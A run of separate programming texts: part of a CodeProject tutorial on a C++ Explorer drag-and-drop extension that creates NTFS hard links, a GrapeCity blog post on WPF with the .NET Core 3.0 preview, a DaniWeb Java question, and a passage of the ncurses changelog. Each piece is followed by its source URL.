Also, we'll need to add some #defines to stdafx.h to make the CreateHardLink() and shlwapi.dll function prototypes visible:

#define WINVER       0x0500
#define _WIN32_WINNT 0x0500
#define _WIN32_IE    0x0400

Defining WINVER as 0x0500 enables features specific to Windows 2000, and defining _WIN32_WINNT as 0x0500 enables NT features specific to Windows 2000. Defining _WIN32_IE as 0x0400 enables features introduced with IE 4.
Here's the prototype for Initialize(), to refresh your memory: HRESULT IShellExtInit::Initialize ( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hProgID ); For drag and drop extensions, pidlFolder is the PIDL of the folder where the items were dropped. (I'll have more to say about the PIDL later.) pDataObj is an IDataObject interface with which we can enumerate all of the items that were dropped. hProgID is an open HKEY on our shell extension's key under HKEY_CLASSES_ROOT. Our first step is to load a bitmap for our menu item. Then, we attach a COleDataObject variable to the IDataObject interface. HRESULT CHardLinkShlExt::Initialize ( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hProgID ) { AFX_MANAGE_STATE(AfxGetStaticModuleState()); // init MFC COleDataObject dataobj; HGLOBAL hglobal; HDROP hdrop; TCHAR szRoot[MAX_PATH]; TCHAR szFileSystemName[256]; TCHAR szFile[MAX_PATH]; UINT uFile, uNumFiles; m_bitmap.LoadBitmap ( IDB_LINKBITMAP ); dataobj.Attach ( pDataObj, FALSE ); Passing FALSE as the second parameter to Attach() means to not release the IDataObject interface when the dataobj variable is destructed. The next step is to get the directory where the items were dropped. We have the PIDL of this directory, but how do we get the path? Time for a little sidebar... "PIDL" is an acronym for pointer to an ID list. A PIDL is a way of uniquely identifying any object within the hierarchy presented by Explorer. Every object in the shell, whether it's part of the file system or not, has a PIDL. The exact structure of a PIDL depends on where the object is, but unless you are writing your own namespace extension, you don't (and shouldn't) have to worry about the internal structure of a PIDL. For our purposes, we can use the shell API SHGetPathFromIDList() to translate the PIDL into a conventional path. If the target folder isn't a directory in the file system (for example, the Control Panel), SHGetPathFromIDList() will fail and we can bail out. 
if ( !SHGetPathFromIDList(pidlFolder, m_szFolderDroppedIn) ) return E_FAIL; Next, we have to check if the target directory is on an NTFS volume. We get the root component of the path (for example, E:\), and get the info about that volume. If the file system is not NTFS, we can't make any links, so we can return. lstrcpy ( szRoot, m_szFolderDroppedIn ); PathStripToRoot ( szRoot ); if ( !GetVolumeInformation ( szRoot, NULL, 0, NULL, NULL, NULL, szFileSystemName, 256 )) { // Couldn't determine file system type. return E_FAIL; } if ( 0 != lstrcmpi ( szFileSystemName, _T("ntfs") )) { // The file system isn't NTFS, so it doesn't support hard links. return E_FAIL; } Next, we get an HDROP handle from the data object, which we'll use to enumerate the files that were dropped. This is similar to the method in Part III, except we're using the MFC class to access the data. COleDataObject handles setting up the FORMATETC and STGMEDIUM structs for us. hglobal = dataobj.GetGlobalData ( CF_HDROP ); if ( NULL == hglobal ) return E_INVALIDARG; hdrop = (HDROP) GlobalLock ( hglobal ); if ( NULL == hdrop ) return E_INVALIDARG; We then use the HDROP handle to enumerate the dropped files. For each one, we check if it is a directory. Directories cannot be linked to, so if we find a directory, we can return. uNumFiles = DragQueryFile ( hdrop, 0xFFFFFFFF, NULL, 0 ); for ( uFile = 0; uFile < uNumFiles; uFile++ ) { if ( DragQueryFile ( hdrop, uFile, szFile, MAX_PATH ) ) { if ( PathIsDirectory ( szFile ) ) { // We found a directory! Bail out. m_lsDroppedFiles.RemoveAll(); break; } We also have to check that the dropped files reside on the same volume as the target directory. What I did was compare the root components of each file and the target directory, and return if they are different. This is not a complete solution, though, since on NTFS volumes, you can mount a volume in the middle of another. For example, you could have a C: volume, and mount another volume as C:\dev. 
This code will not reject an attempt to make a link from C:\dev to somewhere else on C:. Here's the check that compares the root components: if ( !PathIsSameRoot(szFile, m_szFolderDroppedIn) ) { // Dropped files came from a different volume - bail out. m_lsDroppedFiles.RemoveAll(); break; } If the file passes both checks, we add it to m_lsDroppedFiles, which is a CStringList (linked list of CStrings). // Add the file to our list of dropped files. m_lsDroppedFiles.AddTail ( szFile ); } } // end for After the for loop, we release resources and return back to Explorer. If the string list contains any filenames, we return S_OK to indicate we need to modify the context menu. Otherwise, we return E_FAIL so that we won't be called again for this drag and drop event. GlobalUnlock ( hglobal ); return (m_lsDroppedFiles.GetCount() > 0) ? S_OK : E_FAIL; } Like other context menu extensions, a drag and drop handler implements the IContextMenu interface, through which it interacts with the context menu. To add IContextMenu to our extension, open HardLinkShlExt.h again and add the lines listed in bold: class CHardLinkShlExt : public CComObjectRootEx<CComSingleThreadModel>, public CComCoClass<CHardLinkShlExt, &CLSID_HardLinkShlExt>, public IShellExtInit, public IContextMenu { BEGIN_COM_MAP(CHardLinkShlExt) COM_INTERFACE_ENTRY(IShellExtInit) COM_INTERFACE_ENTRY(IContextMenu) END_COM_MAP() public: // IContextMenu STDMETHODIMP GetCommandString(UINT, UINT, UINT*, LPSTR, UINT) { return E_NOTIMPL; } STDMETHODIMP InvokeCommand(LPCMINVOKECOMMANDINFO); STDMETHODIMP QueryContextMenu(HMENU, UINT, UINT, UINT, UINT); Note that we don't need any code in GetCommandString(), because that method is not called in drag and drop handlers. Explorer calls our QueryContextMenu() function to let us modify the context menu. There's nothing here you haven't seen before; we just add one menu item and set its bitmap.
HRESULT CHardLinkShlExt::QueryContextMenu ( HMENU hmenu, UINT uMenuIndex, UINT uidFirstCmd, UINT uidLastCmd, UINT uFlags ) { AFX_MANAGE_STATE(AfxGetStaticModuleState()); // init MFC // If the flags include CMF_DEFAULTONLY then we shouldn't do anything. if ( uFlags & CMF_DEFAULTONLY ) return MAKE_HRESULT ( SEVERITY_SUCCESS, FACILITY_NULL, 0 ); // Add the hard link menu item. InsertMenu ( hmenu, uMenuIndex, MF_STRING | MF_BYPOSITION, uidFirstCmd, _T("Create hard link(s) here") ); if ( NULL != m_bitmap.GetSafeHandle() ) { SetMenuItemBitmaps ( hmenu, uMenuIndex, MF_BYPOSITION, (HBITMAP) m_bitmap.GetSafeHandle(), NULL ); } // Return 1 to tell the shell that we added 1 top-level menu item. return MAKE_HRESULT(SEVERITY_SUCCESS, FACILITY_NULL, 1); } Explorer calls InvokeCommand() when the user clicks our menu item. We'll create links to all the files that were dropped. The names of the links will be "Hard link to <filename>", or, if that name is already in use, "Hard link (2) to <filename>". The number will go up to 99, an arbitrary limit. First, the locals and a check of the lpVerb parameter, which must be 0 since we only have 1 menu item. HRESULT CHardLinkShlExt::InvokeCommand ( LPCMINVOKECOMMANDINFO pInfo ) { AFX_MANAGE_STATE(AfxGetStaticModuleState()); // init MFC TCHAR szNewFilename[MAX_PATH+32]; CString sSrcFile; TCHAR szSrcFileTitle[MAX_PATH]; CString sMessage; UINT uLinkNum; POSITION pos; // Double-check that we're getting called for our own menu item - lpVerb // must be 0. if ( 0 != pInfo->lpVerb ) return E_INVALIDARG; Next, we get a POSITION value pointing at the beginning of the string list. A POSITION is an opaque data type which you don't use directly, but instead you pass it to other methods of the CStringList class.
To get the POSITION of the head of the list, we call GetHeadPosition(): pos = m_lsDroppedFiles.GetHeadPosition(); ASSERT ( NULL != pos ); pos will be NULL if the list is empty, but the list shouldn't be empty, ever, so I added an ASSERT to check for that case. Next up is the beginning of the loop that will iterate through the filenames in the list and make a link to each one. while ( NULL != pos ) { // Get the next source filename. sSrcFile = m_lsDroppedFiles.GetNext ( pos ); // Remove the path - this reduces "C:\xyz\foo\stuff.exe" to "stuff.exe" lstrcpy ( szSrcFileTitle, sSrcFile ); PathStripPath ( szSrcFileTitle ); // Make the filename for the hard link - we'll first try // "Hard link to stuff.exe" wsprintf ( szNewFilename, _T("%sHard link to %s"), m_szFolderDroppedIn, szSrcFileTitle ); GetNext() returns the CString at the position indicated by pos, and increments pos to point at the next string. If pos was at the end of the list, pos becomes NULL (so that's how the while loop will end). At this point, szNewFilename holds the full path of the hard link. We check if a file with this name exists, and if so, we'll try adding numbers 2 through 99, looking for a name that's not already in use. We also make sure the length of the link name (including the terminating null) doesn't exceed MAX_PATH characters. for ( uLinkNum = 2; PathFileExists(szNewFilename) && uLinkNum < 100; uLinkNum++ ) { // Try another filename for the link. wsprintf ( szNewFilename, _T("%sHard link (%u) to %s"), m_szFolderDroppedIn, uLinkNum, szSrcFileTitle ); // If the resulting filename is longer than MAX_PATH, show an // error message. if ( lstrlen(szNewFilename) >= MAX_PATH ) { /* message box code omitted */ } } // end for The message box lets you abort the entire operation if you want. Next, we check to see if we hit the limit of 99 links. Again, we let the user abort the whole operation. if ( 100 == uLinkNum ) { /* message box code omitted */ } All that's left is to make the hard link. I've omitted the error handling code for clarity.
CreateHardLink ( szNewFilename, sSrcFile, NULL ); } // end while return S_OK; } The hard link doesn't look any different in Explorer; it looks like any other ordinary file. But since both names now refer to the same file data, a change made through one name will be visible through the other. Registering a drag and drop handler is simpler than other context menu extensions. All handlers are registered under the HKCR\Directory key, since that's where the drop happens, in a directory. However, what the docs don't say is that registering under HKCR\Directory isn't enough to handle all cases. You also need to register under HKCR\Folder to handle drops on the desktop, and HKCR\Drive to handle drops in root directories. Here is the RGS script to handle all three of the above situations: HKCR { NoRemove Directory { NoRemove shellex { NoRemove DragDropHandlers { ForceRemove HardLinkShlExt = s '{3C06DFAE-062F-11D4-8D3B-919D46C1CE19}' } } } NoRemove Folder { NoRemove shellex { NoRemove DragDropHandlers { ForceRemove HardLinkShlExt = s '{3C06DFAE-062F-11D4-8D3B-919D46C1CE19}' } } } NoRemove Drive { NoRemove shellex { NoRemove DragDropHandlers { ForceRemove HardLinkShlExt = s '{3C06DFAE-062F-11D4-8D3B-919D46C1CE19}' } } } } As with our previous extensions, on NT-based OSes, we need to add our extension to the list of "approved" extensions. The code to do this is in the DllRegisterServer() and DllUnregisterServer() functions in the sample project. You can still build and run the sample project on earlier versions of Windows, or if you don't have an NTFS volume available. Just open the stdafx.h file, and uncomment the line that reads: // #define NOT_ON_WIN2K That will make the extension skip the file system check (so it will run on anything, not just NTFS), and display message boxes instead of actually making links. Coming up in Part V, we'll see a new type of extension, the property sheet handler, which adds pages to the properties dialog for files. April 3, 2000: Article first published.
June 6, 2000: Something updated. ;) May 24, 2006: Updated to cover changes in VC 7.1, cleaned up code snippets. Series Navigation: « Part III | Part V »
http://www.codeproject.com/KB/shell/shellextguide4.aspx
This article has been updated - Migrating a WPF App in .NET Core 3.0 The first .NET Core 3.0 Preview was released a couple of weeks ago. While the preview is still in an early state and missing a few key features (such as designer support), you can already start using it to develop new apps or migrate existing ones. In this article, we’ll look at both creating a new WPF project from scratch using .NET Core 3.0 and migrating an existing WPF project. Creating a new .NET Core 3.0 application To create a new .NET Core 3.0 application, I’d first recommend downloading the VS 2019 Preview. Create a new Visual Studio project: go to File -> New -> Project…, choose WPF App (.NET Core), then click Next. Input the project name, then click on Create. Finally, we can run the project to make sure that it works: dotnet run Now that the project has been created, we can use Visual Studio to open it and modify its contents. In File Explorer, open the csproj file for the project that we just created using Visual Studio 2019. An important note: we were unable to get this to work using the present version of Visual Studio 2017, 15.9.3. Be sure to use the Visual Studio 2019 preview. .NET Core 3.0 uses a new project type and has no design-time support currently, so the process of adding controls will be a little different from what you may be accustomed to. We need to add the C1 libraries to the project manually to make use of them, so right-click on Dependencies and click Add Reference. The C1 WPF libraries are installed into Program Files (x86)\ComponentOne\WPF Edition\bin\v4\ and you should be able to add them by browsing to that location. For this example, we’ll add a linear gauge to our page, and we’ll need to add C1.WPF.4.dll and C1.WPF.Gauge.4.dll.
With the libraries added, we’ll need to add the ComponentOne namespace to our MainWindow.xaml file to work with the control: xmlns:c1="" After the namespace is added we can manipulate the control in XAML. To add a linear gauge you can use the following: <c1:C1LinearGauge You should be able to run the code at this point, though you’ll notice a ComponentOne nag screen since the project doesn’t contain any licensing information. We can correct this by adding a licenses.licx file to the project. To do so, right-click on your project and select Add -> New Item. From here, you’ll need to create a Text File and name it licenses.licx. Once you click Add, be sure to check the properties for the licenses.licx file and make sure the Build Action is set to Embedded resource. You’ll also need to add a line for each control that needs to be licensed into your licenses.licx file. In this simple linear gauge example, we’d need to add this: C1.WPF.Gauge.C1LinearGauge, C1.WPF.Gauge.4 It may help to compare with an existing project when you add this information to the licenses.licx since it is very much a manual process right now (when using .NET Core 3.0). Build and rerun the app and you should no longer see a nag screen. To migrate an existing WPF project, open the Visual Studio Command Prompt and create a new .NET Core project with the same name as the project that you want to migrate. For this example, we’ll work with FlexGrid101. First, we’ll create a new FlexGrid101 project from the command line: dotnet new wpf -o FlexGrid101 Once this is finished, we’ll navigate into the project directory: cd FlexGrid101 I’d also recommend adding the Windows Compatibility package: dotnet add package Microsoft.Windows.Compatibility Next, open the FlexGrid101.csproj file for the project you’ve created inside of Visual Studio 2019. You’ll see something similar to this. We need to replicate the structure of the existing FlexGrid101 project, so we’ll need to add similar folders, files, and assemblies to the project. We’ll start by adding the same assemblies.
FlexGrid101 requires several ComponentOne assemblies. You can right-click on Dependencies and then choose Add Reference to select these libraries and add them to the project. The C1 WPF libraries are installed into: Program Files (x86)\ComponentOne\WPF Edition\bin\v4\ Now, we need to add some folders to this project so that it mirrors the structure of the older one. Right-click on the project, then choose Add -> New Folder. We need to add the following folders: CellFactory, Data, Images, Properties, Resources, Themes, View, and ViewModel. The next step is to add files into these folders in the new project from the old one. To do this, you can right-click on a folder and select Add -> Existing Item. Navigate to the existing FlexGrid101 project (which is typically installed to Documents\ComponentOne Samples\WPF\C1.WPF.FlexGrid\CS\FlexGrid101) and add all of the files for each folder. Be careful to select All Files rather than just VS-specific files so everything is added correctly (including images, XAML files, etc.). Also, you’ll need to copy the contents of the MainWindow.xaml and MainWindow.xaml.cs from the older project to the new. You can either delete the generated one in the new project and then add the existing one from the old project to it, or you can copy and paste the contents of both files (either will work fine here). We’ll also need to make a small change to the csproj file to use the AssemblyInfo.cs files that we copied from the Properties folder of the old project to the new one. Right-click on your project and choose the Unload Project option. Right-click it again and choose Edit FlexGrid101.csproj. Within the PropertyGroup node add this line: <GenerateAssemblyInfo>false</GenerateAssemblyInfo> Save your changes, and right-click the project again and choose Reload Project. Finally, we need to be sure that certain file types are included in the project correctly by setting the Build Action. At this point, you should be able to build and run the project.
https://www.grapecity.com/blogs/using-the-dot-net-core-3-0-preview-with-wpf
I'm having a problem whereby I create an instance of a class called Calculations.class in one of my main classes, but cannot access that instance from any other class. Here is the code public class Parameters{ //code// Calculations calc = new Calculations(); //some calculations done using variables in the calculations class and new data is saved// //end of Parameters.class// } public class Intake{ // I now want to work with the instance "calc" created above so I can use the variables that were set in Parameters.class, but I don't know how to reference this instance!! // Any help will be greatly appreciated, thank you!!
https://www.daniweb.com/programming/software-development/threads/14419/problems-accessing-class-instances
!30324 38 2013/03/24 23:58:0730324 49 + build-fix for libtool configuration (reports by Daniel Silva Ferreira 50 and Roumen Petrov). 51 52 20130323 53 + build-fix for OS X, to handle changes for --with-cxx-shared feature 54 (report by Christian Ebert). 55 + change initialization for vt220, similar entries for consistency 56 with cursor-key strings (NetBSD #47674) -TD 57 + further improvements to linux-16color (Benjamin Sittler) 58 59 20130316 60 + additional fix for tic.c, to allocate missing buffer space. 61 + eliminate configure-script warnings for gen-pkgconfig.in 62 + correct typo in sgr string for sun-color, 63 add bold for consistency with sgr, 64 change smso for consistency with sgr -TD 65 + correct typo in sgr string for terminator -TD 66 + add blink to the attributes masked by ncv in linux-16color (report 67 by Benjamin Sittler) 68 + improve warning message from post-load checking for missing "%?" 69 operator by tic/infocmp by showing the entry name and capability. 70 + minor formatting improvement to tic/infocmp -f option to ensure 71 line split after "%;". 72 + amend scripting for --with-cxx-shared option to handle the debug 73 library "libncurses++_g.a" (report by Sven Joachim). 74 75 20130309 76 + amend change to toe.c for reading from /dev/zero, to ensure that 77 there is a buffer for the temporary filename (cf: 20120324). 78 + regenerated html manpages. 79 + fix typo in terminfo.head (report by Sven Joachim, cf: 20130302). 80 + updated some autoconf macros: 81 + CF_ACVERSION_CHECK, from byacc 1.9 20130304 82 + CF_INTEL_COMPILER, CF_XOPEN_SOURCE from luit 2.0-20130217 83 + add configure option --with-cxx-shared to permit building 84 libncurses++ as a shared library when using g++, e.g., the same 85 limitations as libtool but better integrated with the usual build 86 configuration (Redhat #911540). 87 + modify MKkey_defs.sh to filter out build-path which was unnecessarily 88 shown in curses.h (Debian #689131). 
89 90 20130302 91 + add section to terminfo manpage discussing user-defined capabilities. 92 + update manpage description of NCURSES_NO_SETBUF, explaining why it 93 is obsolete. 94 + add a check in waddch_nosync() to ensure that tab characters are 95 treated as control characters; some broken locales claim they are 96 printable. 97 + add some traces to the Windows console driver. 98 + initialize a temporary array in _nc_mbtowc, needed for some cases 99 of raw input in MinGW port. 100 101 20130218 102 + correct ifdef on change to lib_twait.c (report by Werner Fink). 103 + update config.guess, config.sub 104 105 20130216 106 + modify test/testcurs.c to work with mouse for ncurses as it does for 107 pdcurses. 108 + modify test/knight.c to work with mouse for pdcurses as it does for 109 ncurses. 110 + modify internal recursion in wgetch() which handles cooked mode to 111 check if the call to wgetnstr() returned an error. This can happen 112 when both nocbreak() and nodelay() are set, for instance (report by 113 Nils Christopher Brause) (cf: 960418). 114 + fixes for issues found by Coverity: 115 + add a check for valid position in ClearToEOS() 116 + fix in lib_twait.c when --enable-wgetch-events is used, pointer 117 use after free. 118 + improve a limit-check in make_hash.c 119 + fix a memory leak in hashed_db.c 120 121 20130209 122 + modify test/configure script to make it simpler to override names 123 of curses-related libraries, to help with linking with pdcurses in 124 mingw environment. 125 + if the --with-terminfo-dirs configure option is not used, there is 126 no corresponding compiled-in value for that. Fill in "no default 127 value" for that part of the manpage substitution. 128 129 20130202 130 + correct initialization in knight.c which let it occasionally make 131 an incorrect move (cf: 20001028). 132 + improve documentation of the terminfo/termcap search path. 
133 134 20130126 135 + further fixes to mvcur to pass callback function (cf: 20130112), 136 needed to make test/dots_mvcur work. 137 + reduce calls to SetConsoleActiveScreenBuffer in win_driver.c, to 138 help reduce flicker. 139 + modify configure script to omit "+b" from linker options for very 140 old HP-UX systems (report by Dennis Grevenstein) 141 + add HP-UX workaround for missing EILSEQ on old HP-UX systems (patch 142 by Dennis Grevenstein). 143 + restore memmove/strdup support for antique systems (request by 144 Dennis Grevenstein). 145 + change %l behavior in tparm to push the string length onto the stack 146 rather than saving the formatted length into the output buffer 147 (report by Roy Marples, cf: 980620). 148 149 20130119 150 + fixes for issues found by Coverity: 151 + fix memory leak in safe_sprintf.c 152 + add check for return-value in tty_update.c 153 + correct initialization for -s option in test/view.c 154 + add check for numeric overflow in lib_instr.c 155 + improve error-checking in copywin 156 + add advice in infocmp manpage for termcap users (Debian #698469). 157 + add "-y" option to test/demo_termcap and test/demo_terminfo to 158 demonstrate behavior with/without extended capabilities. 159 + updated termcap manpage to document legacy termcap behavior for 160 matching capability names. 161 + modify name-comparison for tgetstr, etc., to accommodate legacy 162 applications as well as to improve compatbility with BSD 4.2 163 termcap implementations (Debian #698299) (cf: 980725). 164 165 20130112 166 + correct prototype in manpage for vid_puts. 167 + drop ncurses/tty/tty_display.h, ncurses/tty/tty_input.h, since they 168 are unused in the current driver model. 169 + modify mvcur to use stdout except when called within the ncurses 170 library. 171 + modify vidattr and vid_attr to use stdout as documented in manpage. 
172 + amend changes made to buffering in 20120825 so that the low-level 173 putp() call uses stdout rather than ncurses' internal buffering. 174 The putp_sp() call does the same, for consistency (Redhat #892674). 175 176 20130105 177 + add "-s" option to test/view.c to allow it to start in single-step 178 mode, reducing size of trace files when it is used for debugging 179 MinGW changes. 180 + revert part of 20121222 change to tinfo_driver.c 181 + add experimental logic in win_driver.c to improve optimization of 182 screen updates. This does not yet work with double-width characters, 183 so it is ifdef'd out for the moment (prompted by report by Erwin 184 Waterlander regarding screen flicker). 185 186 20121229 187 + fix coverity warnings regarding copying into fixed-size buffers. 188 + add throw-declarations in the c++ binding per Coverity warning. 189 + minor changes to new-items for consistent reference to bug-report 190 numbers. 191 192 20121222 193 + add *.dSYM directories to clean-rule in ncurses directory makefile, 194 for Mac OS builds. 195 + add a configure check for gcc option -no-cpp-precomp, which is not 196 available in all Mac OS X configurations (report by Andras Salamon, 197 cf: 20011208). 198 + improve 20021221 workaround for broken acs, handling a case where 199 that ACS_xxx character is not in the acsc string but there is a known 200 wide-character which can be used. 201 202 20121215 203 + fix several warnings from clang 3.1 --analyze, includes correcting 204 a null-pointer check in _nc_mvcur_resume. 205 + correct display of double-width characters with MinGW port (report 206 by Erwin Waterlander). 207 + replace MinGW's wcrtomb(), fixing a problem with _nc_viscbuf 208 > fixes based on Coverity report: 209 + correct coloring in test/bs.c 210 + correct check for 8-bit value in _nc_insert_ch(). 211 + remove dead code in progs/tset.c, test/linedata.h 212 + add null-pointer checks in lib_tracemse.c, panel.priv.h, and some 213 test-programs. 
214 215 20121208 216 + modify test/knight.c to show the number of choices possible for 217 each position in automove option, e.g., to allow user to follow 218 Warnsdorff's rule to solve the puzzle. 219 + modify test/hanoi.c to show the minimum number of moves possible for 220 the given number of tiles (prompted by patch by Lucas Gioia). 221 > fixes based on Coverity report: 222 + remove a few redundant checks. 223 + correct logic in test/bs.c, when randomly placing a specific type of 224 ship. 225 + check return value from remove/unlink in tic. 226 + check return value from sscanf in test/ncurses.c 227 + fix a null dereference in c++/cursesw.cc 228 + fix two instances of uninitialized variables when configuring for the 229 terminal driver. 230 + correct scope of variable used in SetSafeOutcWrapper macro. 231 + set umask when calling mkstemp in tic. 232 + initialize wbkgrndset() temporary variable when extended-colors are 233 used. 234 235 20121201 236 + also replace MinGW's wctomb(), fixing a problem with setcchar(). 237 + modify test/view.c to load UTF-8 when built with MinGW by using 238 regular win32 API because the MinGW functions mblen() and mbtowc() 239 do not work. 240 241 20121124 242 + correct order of color initialization versus display in some of the 243 test-programs, e.g., test_addstr.c 244 > fixes based on Coverity report: 245 + delete windows on exit from some of the test-programs. 246 247 20121117 248 > fixes based on Coverity report: 249 + add missing braces around FreeAndNull in two places. 
250 + various fixes in test/ncurses.c 251 + improve limit-checks in tinfo/make_hash.c, tinfo/read_entry.c 252 + correct malloc size in progs/infocmp.c 253 + guard against negative array indices in test/knight.c 254 + fix off-by-one limit check in test/color_name.h 255 + add null-pointer check in progs/tabs.c, test/bs.c, test/demo_forms.c, 256 test/inchs.c 257 + fix memory-leak in tinfo/lib_setup.c, progs/toe.c, 258 test/clip_printw.c, test/demo_menus.c 259 + delete unused windows in test/chgat.c, test/clip_printw.c, 260 test/insdelln.c, test/newdemo.c on error-return. 261 262 20121110 263 + modify configure macro CF_INCLUDE_DIRS to put $CPPFLAGS after the 264 local -I include options in case someone has set conflicting -I 265 options in $CPPFLAGS (prompted by patch for ncurses/Makefile.in by 266 Vassili Courzakis). 267 + modify the ncurses*-config scripts to eliminate relative paths from 268 the RPATH_LIST variable, e.g., "../lib" as used in installing shared 269 libraries or executables. 270 271 20121102 272 + realign these related pages: 273 curs_add_wchstr.3x 274 curs_addchstr.3x 275 curs_addstr.3x 276 curs_addwstr.3x 277 and fix a long-ago error in curs_addstr.3x which said that a -1 278 length parameter would only write as much as fit onto one line 279 (report by Reuben Thomas). 280 + remove obsolete fallback _nc_memmove() for memmove()/bcopy(). 281 + remove obsolete fallback _nc_strdup() for strdup(). 282 + cancel any debug-rpm in package/ncurses.spec 283 + reviewed vte-2012, reverted most of the change since it was incorrect 284 based on testing with tack -TD 285 + un-cancel the initc in vte-256color, since this was implemented 286 starting with version 0.20 in 2009 -TD 287 288 20121026 289 + improve malloc/realloc checking (prompted by discussion in Redhat 290 #866989). 291 + add ncurses test-program as "ncurses6" to the rpm- and dpkg-scripts. 292 + updated configure macros CF_GCC_VERSION and CF_WITH_PATHLIST. 
The 293 first corrects pattern used for Mac OS X's customization of gcc. 294 295 20121017 296 + fix change to _nc_scroll_optimize(), which incorrectly freed memory 297 (Redhat #866989). 298 299 20121013 300 + add vte-2012, gnome-2012, making these the defaults for vte/gnome 301 (patch by Christian Persch). 302 303 20121006 304 + improve CF_GCC_VERSION to work around Debian's customization of gcc 305 --version message. 306 + improve configure macros as done in byacc: 307 + drop 2.13 compatibility; use 2.52.xxxx version only since EMX port 308 has used that for a while. 309 + add 3rd parameter to AC_DEFINE's to allow autoheader to run, i.e., 310 for experimental use. 311 + remove unused configure macros. 312 + modify configure script and makefiles to quiet new autoconf warning 313 for LIBS_TO_MAKE variable. 314 + modify configure script to show $PATH_SEPARATOR variable. 315 + update config.guess, config.sub 316 317 20120922 318 + modify setupterm to set its copy of TERM to "unknown" if configured 319 for the terminal driver and TERM was null or empty. 320 + modify treatment of TERM variable for MinGW port to allow explicit 321 use of the windows console driver by checking if $TERM is set to 322 "#win32con" or an abbreviation of that. 323 + undo recent change to fallback definition of vsscanf() to build with 324 older Solaris compilers (cf: 20120728). 325 326 20120908 327 + add test-screens to test/ncurses to show 256-characters at a time, 328 to help with MinGW port. 329 330 20120903 331 + simplify varargs logic in lib_printw.c; va_copy is no longer needed 332 there. 333 + modifications for MinGW port to make wide-character display usable. 334 335 20120902 336 + regenerate configure script (report by Sven Joachim, cf: 20120901). 337 338 20120901 339 + add a null-pointer check in _nc_flush (cf: 20120825). 340 + fix a case in _nc_scroll_optimize() where the _oldnums_list array 341 might not be allocated. 
342 + improve comparisons in configure.in for unset shell variables. 343 344 20120826 345 + increase size of ncurses' output-buffer, in case of very small 346 initial screen-sizes. 347 + fix evaluation of TERMINFO and TERMINFO_DIRS default values as needed 348 after changes to use --datarootdir (reports by Gabriele Balducci, 349 Roumen Petrov). 350 351 20120825 352 + change output buffering scheme, using buffer maintained by ncurses 353 rather than stdio, to avoid problems with SIGTSTP handling (report 354 by Brian Bloniarz). 355 356 20120811 357 + update autoconf patch to 2.52.20120811, adding --datarootdir 358 (prompted by discussion with Erwin Waterlander). 359 + improve description of --enable-reentrant option in README and the 360 INSTALL file. 361 + add nsterm-256color, make this the default nsterm -TD 362 + remove bw from nsterm-bce, per testing with tack -TD 363 364 20120804 365 + update test/configure, adding check for tinfo library. 366 + improve limit-checks for the getch fifo (report by Werner Fink). 367 + fix a remaining mismatch between $with_echo and the symbols updated 368 for CF_DISABLE_ECHO affecting parameters for mk-2nd.awk (report by 369 Sven Joachim, cf: 20120317). 370 + modify followup check for pkg-config's library directory in the 371 --enable-pc-files option to validate syntax (report by Sven Joachim, 372 cf: 20110716). 373 374 20120728 375 + correct path for ncurses_mingw.h in include/headers, in case build 376 is done outside source-tree (patch by Roumen Petrov). 377 + modify some older xterm entries to align with xterm source -TD 378 + separate "xterm-old" alias from "xterm-r6" -TD 379 + add E3 extended capability to xterm-basic and putty -TD 380 + parenthesize parameters of other macros in curses.h -TD 381 + parenthesize parameter of COLOR_PAIR and PAIR_NUMBER in curses.h 382 in case it happens to be a comma-expression, etc. (patch by Nick 383 Black). 384 385 20120721 386 + improved form_request_by_name() and menu_request_by_name(). 
  + eliminate two fixed-size buffers in toe.c
  + extend use_tioctl() to have expected behavior when use_env(FALSE) and
    use_tioctl(TRUE) are called.
  + modify ncurses test-program, adding -E and -T options to demonstrate
    use_env() versus use_tioctl().

20120714
  + add use_tioctl() function (adapted from patch by Werner Fink,
    Novell #769788):

20120707
  + add ncurses_mingw.h to installed headers (prompted by patch by
    Juergen Pfeifer).
  + clarify return-codes from wgetch() in response to SIGWINCH (prompted
    by Novell #769788).
  + modify resizeterm() to always push a KEY_RESIZE onto the fifo, even
    if screensize is unchanged.  Modify _nc_update_screensize() to push a
    KEY_RESIZE if there was a SIGWINCH, even if it does not call
    resizeterm().  These changes eliminate the case where a SIGWINCH is
    received, but ERR returned from wgetch or wgetnstr because the screen
    dimensions did not change (Novell #769788).

20120630
  + add --enable-interop to sample package scripts (suggested by Juergen
    Pfeifer).
  + update CF_PATH_SYNTAX macro, from mawk changes.
  + modify mk-0th.awk to allow for generating llib-ltic, etc., though
    some work is needed on cproto to work with lib_gen.c to update
    llib-lncurses.
  + remove redundant getenv() call in database-iterator leftover from
    cleanup in 20120622 changes (report by Sven Joachim).

20120622
  + add -d, -e and -q options to test/demo_terminfo and test/demo_termcap
  + fix caching of environment variables in database-iterator (patch by
    Philippe Troin, Redhat #831366).

20120616
  + add configure check to distinguish clang from gcc to eliminate
    warnings about unused command-line parameters when compiler warnings
    are enabled.
  + improve behavior when updating terminfo entries which are hardlinked
    by allowing for the possibility that an alias has been repurposed to
    a new primary name.
  + fix some strict compiler warnings based on package scripts.
  + further fixes for configure check for working poll (Debian #676461).

20120608
  + fix an uninitialized variable in -c/-n logic for infocmp changes
    (cf: 20120526).
  + corrected fix for building c++ binding with clang 3.0 (report/patch
    by Richard Yao, Gentoo #417613, cf: 20110409)
  + correct configure check for working poll, fixing the case where stdin
    is redirected, e.g., in rpm/dpkg builds (Debian #676461).
  + add rpm- and dpkg-scripts, to test those build-environments.
    The resulting packages are used only for testing.

20120602
  + add kdch1 aka "Remove" to vt220 and vt220-8 entries -TD
  + add kdch1, etc., to qvt108 -TD
  + add dl1/il1 to some entries based on dl/il values -TD
  + add dl to simpleterm -TD
  + add consistency-checks in tic for insert-line vs delete-line
    controls, and insert/delete-char keys
  + correct no-leaks logic in infocmp when doing comparisons, fixing
    duplicate free of entries given via the command-line, and freeing
    entries loaded from the last-but-one of files specified on the
    command-line.
  + add kdch1 to wsvt25 entry from NetBSD CVS (reported by David Lord,
    analysis by Martin Husemann).
  + add cnorm/civis to wsvt25 entry from NetBSD CVS (report/analysis by
    Onno van der Linden).

20120526
  + extend -c and -n options of infocmp to allow comparing more than two
    entries.
  + correct check in infocmp for number of terminal names when more than
    two are given.
  + correct typo in curs_threads.3x (report by Yanhui Shen on
    freebsd-hackers mailing list).

20120512
  + corrected 'op' for bterm (report by Samuel Thibault) -TD
  + modify test/background.c to demonstrate a background character
    holding a colored ACS_HLINE.  The behavior differs from SVr4 due to
